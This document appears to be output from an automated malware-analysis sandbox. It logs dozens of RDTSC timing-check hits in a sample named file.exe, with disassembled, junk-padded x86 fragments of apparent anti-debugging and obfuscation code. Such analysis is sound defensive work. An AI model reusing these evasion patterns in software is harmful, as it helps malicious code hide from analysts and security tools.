Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5031F6 second address: 503293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 js 00007F2AF93CAAB8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F2AF93CAABAh 0x00000016 mov edx, dword ptr [ebp+122D2A6Eh] 0x0000001c push 00000000h 0x0000001e jo 00007F2AF93CAABAh 0x00000024 mov dx, 9873h 0x00000028 or dword ptr [ebp+122D3152h], edi 0x0000002e push 12753186h 0x00000033 push ebx 0x00000034 push eax 0x00000035 jmp 00007F2AF93CAAC9h 0x0000003a pop eax 0x0000003b pop ebx 0x0000003c xor dword ptr [esp], 12753106h 0x00000043 and edx, 2AC5CEBEh 0x00000049 push 00000003h 0x0000004b mov esi, dword ptr [ebp+122D2A42h] 0x00000051 push 00000000h 0x00000053 sub cl, FFFFFFE8h 0x00000056 push 00000003h 0x00000058 mov dword ptr [ebp+122D34DAh], edi 0x0000005e jmp 00007F2AF93CAAC8h 0x00000063 call 00007F2AF93CAAB9h 0x00000068 push esi 0x00000069 push eax 0x0000006a push edx 0x0000006b push edi 0x0000006c pop edi 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 503293 second address: 5032CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4EA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F2AF86F4EACh 0x00000013 jmp 00007F2AF86F4EA6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5032CE second address: 503301 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F2AF93CAAC3h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503301 second address: 503306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503306 second address: 503380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F2AF93CAAC0h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jl 00007F2AF93CAAB8h 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f jmp 00007F2AF93CAAC7h 0x00000024 pop eax 0x00000025 jmp 00007F2AF93CAAC8h 0x0000002a mov si, 5B37h 0x0000002e lea ebx, dword ptr [ebp+124550C5h] 0x00000034 pushad 0x00000035 mov dword ptr [ebp+122D24F3h], esi 0x0000003b popad 0x0000003c or dword ptr [ebp+122D1832h], eax 0x00000042 xchg eax, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503380 second address: 503385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503385 second address: 50338B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503535 second address: 503539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503539 second address: 503594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dx, ax 0x00000010 push 00000000h 0x00000012 call 00007F2AF93CAAC4h 0x00000017 or dword ptr [ebp+122D188Dh], eax 0x0000001d pop edi 0x0000001e call 00007F2AF93CAAB9h 0x00000023 push edi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F2AF93CAAC5h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 503594 second address: 5035C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F2AF86F4EA7h 0x0000000f je 00007F2AF86F4E96h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5035C0 second address: 5035E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jo 00007F2AF93CAAC0h 0x00000011 jmp 00007F2AF93CAABAh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5035E3 second address: 5035E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E6269 second address: 4E626F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5228DE second address: 5228E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5228E4 second address: 5228E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5228E8 second address: 522908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2AF86F4EA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522EFE second address: 522F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2AF93CAAC7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523077 second address: 523084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2AF86F4E96h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 523227 second address: 52322D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524249 second address: 52424D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524550 second address: 524566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF93CAAC0h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 524566 second address: 52456A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 526FD1 second address: 527013 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F2AF93CAAC3h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F2AF93CAAC1h 0x00000019 ja 00007F2AF93CAAB6h 0x0000001f popad 0x00000020 js 00007F2AF93CAABCh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527013 second address: 527032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2AF86F4EA5h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527032 second address: 52703B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52703B second address: 527066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F2AF86F4EA5h 0x00000014 jno 00007F2AF86F4E96h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527066 second address: 52706C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52706C second address: 527070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AF0D second address: 52AF1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABBh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52AF1E second address: 52AF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2C05 second address: 4E2C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2AF93CAAC2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2C1F second address: 4E2C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2C23 second address: 4E2C29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2C29 second address: 4E2C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531BBE second address: 531BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jl 00007F2AF93CAAB6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5311C4 second address: 5311C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5311C8 second address: 5311D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F2AF93CAABCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531350 second address: 531355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531498 second address: 53149E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53149E second address: 5314A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53189B second address: 5318AB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F2AF93CAABEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5318AB second address: 5318B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531A3A second address: 531A4C instructions: 0x00000000 rdtsc 0x00000002 js 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531A4C second address: 531A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531A54 second address: 531A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531A5D second address: 531A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 531A63 second address: 531A6F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53505D second address: 535073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF86F4EA2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535073 second address: 535090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F2AF93CAABCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535571 second address: 535577 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535667 second address: 53566B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53566B second address: 535675 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2AF86F4E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535675 second address: 53567A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535C52 second address: 535C5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535C5B second address: 535C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F2AF93CAAB6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535C6D second address: 535CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F2AF86F4E98h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 jng 00007F2AF86F4E9Ch 0x00000028 mov edi, dword ptr [ebp+122D298Ah] 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F2AF86F4E9Dh 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 535D7B second address: 535D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53673B second address: 536745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53703C second address: 537080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e mov edi, 10778B0Fh 0x00000013 push 00000000h 0x00000015 jmp 00007F2AF93CAAC6h 0x0000001a xchg eax, ebx 0x0000001b push ecx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 pop ecx 0x00000023 push eax 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537080 second address: 537086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538A9D second address: 538AA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53779E second address: 5377A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538AA3 second address: 538AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538843 second address: 538847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538AA7 second address: 538B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub si, 62EDh 0x00000013 push 00000000h 0x00000015 mov edi, dword ptr [ebp+122D29FAh] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F2AF93CAAB8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov esi, dword ptr [ebp+122D34A2h] 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jnc 00007F2AF93CAAC9h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538847 second address: 538852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538B0B second address: 538B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AF93CAABAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538852 second address: 53885D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538B19 second address: 538B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A00E second address: 53A012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53DE36 second address: 53DE3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EDFB second address: 53EDFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EDFF second address: 53EE32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF93CAABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2AF93CAABDh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2AF93CAAC2h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53EE32 second address: 53EEAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4EA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F2AF86F4E98h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007F2AF86F4E98h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 0000001Dh 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 mov dword ptr [ebp+124554C7h], esi 0x00000046 mov bl, 09h 0x00000048 push 00000000h 0x0000004a mov edi, eax 0x0000004c push eax 0x0000004d pushad 0x0000004e pushad 0x0000004f jmp 00007F2AF86F4E9Dh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B442 second address: 53B446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54258C second address: 542659 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AF86F4E9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007F2AF86F4EA2h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F2AF86F4E98h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D2C36h] 0x00000031 push 00000000h 0x00000033 call 00007F2AF86F4EA8h 0x00000038 mov edi, dword ptr [ebp+122D358Dh] 0x0000003e pop edi 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push esi 0x00000044 call 00007F2AF86F4E98h 0x00000049 pop esi 0x0000004a mov dword ptr [esp+04h], esi 0x0000004e add dword ptr [esp+04h], 00000017h 0x00000056 inc esi 0x00000057 push esi 0x00000058 ret 0x00000059 pop esi 0x0000005a ret 0x0000005b jmp 00007F2AF86F4EA4h 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 jmp 00007F2AF86F4EA0h 0x00000069 jmp 00007F2AF86F4EA1h 0x0000006e popad 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542659 second address: 54266C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2AF93CAAB8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54266C second address: 542670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542670 second address: 542676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53F03E second address: 53F043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5416EE second address: 54170B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2AF93CAAB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F2AF93CAABCh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 583881 second address: 58388B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
